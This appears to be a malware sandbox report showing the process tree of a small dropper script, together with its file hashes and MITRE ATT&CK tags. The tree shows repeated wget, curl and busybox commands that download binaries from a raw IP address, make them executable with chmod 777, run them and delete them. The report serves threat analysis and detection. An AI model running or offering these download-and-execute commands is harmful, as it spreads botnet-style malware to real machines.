/usr/bin/wgetwget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1654
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1656
-
-
/bin/chmodchmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1659
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1660
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1662
-
-
/bin/chmodchmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz./93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1665
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1666
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1668
-
-
/bin/chmodchmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1671
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1672
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Writes file to tmp directory
PID:1675
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1676
-
-
/bin/chmodchmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- File and Directory Permissions Modification
PID:1677
-
-
/tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Executes dropped EXE
PID:1678
-
-
/bin/rmrm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1679
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1680
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Writes file to tmp directory
PID:1681
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1682
-
-
/bin/chmodchmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- File and Directory Permissions Modification
PID:1683
-
-
/tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Executes dropped EXE
PID:1684
-
-
/bin/rmrm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1685
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97